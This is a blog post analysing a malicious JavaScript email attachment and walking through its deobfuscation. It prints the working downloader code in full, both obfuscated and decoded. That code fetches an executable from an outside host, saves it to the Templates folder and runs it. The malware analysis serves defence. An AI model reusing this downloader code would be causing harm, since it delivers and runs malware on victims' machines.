Just a quick post for today’s blog. Once again went digging through some emails looking for some badness and came across an email that had a zipped Javascript file in it. Seeing this I thought that I would take a crack at trying to deobfuscate the script. I’ll post later on what traffic comes from the script when running it on my VM. Until then, you can find the malicious javascript and the cleaned up script files here.
At first glance, this Javascript file made no sense since Notepad++ was treating most of the script as a comment since it had a single quote in front of the different lines of code. Looking at this closer though, towards the bottom of script I saw the following lines (cleaned up for ease of reading):
kdXOLBlxIERnCswVzJF = "2"+"01"+"7"; RIlBrOJdmCUabxi = "g"+"etY"+"ea"+"r"; if (new Date()[RIlBrOJdmCUabxi]() == new Array(kdXOLBlxIERnCswVzJF)[0]) { wQIqKsjtGhlHXSx = eval(xodPYuwDNgEZAiMUVze.split("DhiVREQMNo").join("")); } if (IrUghzeHiLAnRwBYQ == 18792/324) { yZjUCNFRhDgSkWowX = eval(mcvrslBFKoRwYzP); }
Some quick Googling around to get verify my thoughts about the ‘new Date’ and “new Array” references, I saw that the first IF statement will always return a “true” since the variable ‘RIlBrOJdmCUabxi’ is equal to “getYear,” which grabs the year from the new Date reference in the IF statement. This is then checked to see if the variable “kdXOLBlxIERnCswVzJF” is equal to 2017 (which is also placed into an array at location 0). Since that will return true for any time this year (2017), the IF condition is met. The other IF statement is not run in this case and looks to be an exit for the script.
Scrolling through the script, I also saw the repeated use of the “DhiVREQMNo” string. I was not sure what exactly this string did since there is a mention of it after the split method shown above. It was here that one of my colleagues advised me to go through the script and remove that string (DhiVREQMNo) from anywhere in the script and then concatenate everything back together again. Once I did that, I got the following code:
xodPYuwDNgEZAiMUVze = yrgxYHAdUtRVIXCeNW = new ActiveXObject("wscRipt.sHell"); WuwrRvHfinaoKSYqDG = yrgxYHAdUtRVIXCeNW.RegRead("HKLM"+String.fromCharCode(92)+"software"+String.fromCharCode(92)+"microsoft"+String.fromCharCode(92)+"windows"+String.fromCharCode(92)+"currentversion"+String.fromCharCode(92)+"programfilesdir"); oRpfPzUSJtCaiKcr = WuwrRvHfinaoKSYqDG.charAt(1); IrUghzeHiLAnRwBYQ = WuwrRvHfinaoKSYqDG.charCodeAt(1); mcvrslBFKoRwYzP = "eval(unescape("+String.fromCharCode(39)+"var%20wsh%20%3D%20new%20ActiveXObject%28%22wscript%2Eshell%22%29%3B%0D%0Avar%20sh%20%3D%20new%20ActiveXObject%28%22shell%2Eapplication%22%29%3B%0D%0Avar%20HTTP%20%3D%20new%20ActiveXObject%28%22MSXML%32%2EXMLHTTP%22%29%3B%0D%0Avar%20Stream%20%3D%20new%20ActiveXObject%28%22ADODB%2EStream%22%29%3B%0D%0Avar%20path%20%3D%20wsh%2ESpecialFolders%28%22Templates%22%29%2B%22%5C%5C%22%2B%28%28Math%2Erandom%28%29%2A%39%39%39%39%39%39%29%2B%39%39%39%39%7C%30%29%2B%22%2Eexe%22%3B%0D%0AHTTP%2EOpen%28%22GET%22%2C%20%22http%3A%2F%2Fpichdollard%2Etop%2Fadmin%2Ephp%3Ff%3D%34%30%34%22%2C%20false%29%3B%20HTTP%2ESend%28%29%3B%20if%20%28HTTP%2EStatus%20%3D%3D%20%32%30%30%29%20%7B%0D%0AStream%2EOpen%28%29%3B%20Stream%2EType%20%3D%20%31%3B%20Stream%2EWrite%28HTTP%2EResponseBody%29%3B%20%0D%0AStream%2EPosition%20%3D%20%30%3B%20Stream%2ESaveToFile%28path%2C%20%32%29%3B%0D%0AStream%2EClose%28%29%3B%20sh%2EShellExecute%28path%2C%20%22%22%2C%20%22%22%2C%20%22open%22%2C%20%31%29%3B%20%7D" String.fromCharCode(39)+"));";; kdXOLBlxIERnCswVzJF = "2"+"01"+"7"; RIlBrOJdmCUabxi = "g"+"etY"+"ea"+"r"; if (new Date()[RIlBrOJdmCUabxi]() == new Array(kdXOLBlxIERnCswVzJF)[0]) { wQIqKsjtGhlHXSx = eval(xodPYuwDNgEZAiMUVze.split("").join("")); } if (IrUghzeHiLAnRwBYQ == 18792/324) { yZjUCNFRhDgSkWowX = eval(mcvrslBFKoRwYzP); }
From here, I used the site http://ddecode.com/hexdecoder/ to decode the URL encoded part of the script. Below is the cleaned up script:
xodPYuwDNgEZAiMUVze = yrgxYHAdUtRVIXCeNW = new ActiveXObject("wscRipt.sHell"); WuwrRvHfinaoKSYqDG = yrgxYHAdUtRVIXCeNW.RegRead("HKLM"+String.fromCharCode(92)+"software"+String.fromCharCode(92)+"microsoft"+String.fromCharCode(92)+"windows"+String.fromCharCode(92)+"currentversion"+String.fromCharCode(92)+"programfilesdir"); oRpfPzUSJtCaiKcr = WuwrRvHfinaoKSYqDG.charAt(1); IrUghzeHiLAnRwBYQ = WuwrRvHfinaoKSYqDG.charCodeAt(1); mcvrslBFKoRwYzP = "eval(unescape("+String.fromCharCode(39)+"var wsh = new ActiveXObject("wscript.shell"); var sh = new ActiveXObject("shell.application"); var HTTP = new ActiveXObject("MSXML2.XMLHTTP"); var Stream = new ActiveXObject("ADODB.Stream"); var path = wsh.SpecialFolders("Templates")+"\\"+((Math.random()*999999)+9999|0)+".exe"; HTTP.Open("GET", "http://pichdollard.top/admin.php?f=404", false); HTTP.Send(); if (HTTP.Status == 200) { Stream.Open(); Stream.Type = 1; Stream.Write(HTTP.ResponseBody); Stream.Position = 0; Stream.SaveToFile(path, 2); Stream.Close(); sh.ShellExecute(path, "", "", "open", 1); }" String.fromCharCode(39)+"));";; kdXOLBlxIERnCswVzJF = "2"+"01"+"7"; RIlBrOJdmCUabxi = "g"+"etY"+"ea"+"r"; if (new Date()[RIlBrOJdmCUabxi]() == new Array(kdXOLBlxIERnCswVzJF)[0]) { wQIqKsjtGhlHXSx = eval(xodPYuwDNgEZAiMUVze.split("").join("")); } if (IrUghzeHiLAnRwBYQ == 18792/324) { yZjUCNFRhDgSkWowX = eval(mcvrslBFKoRwYzP); }
Now to see if I can pull the traffic from this malicious binary and match it up to what I see here.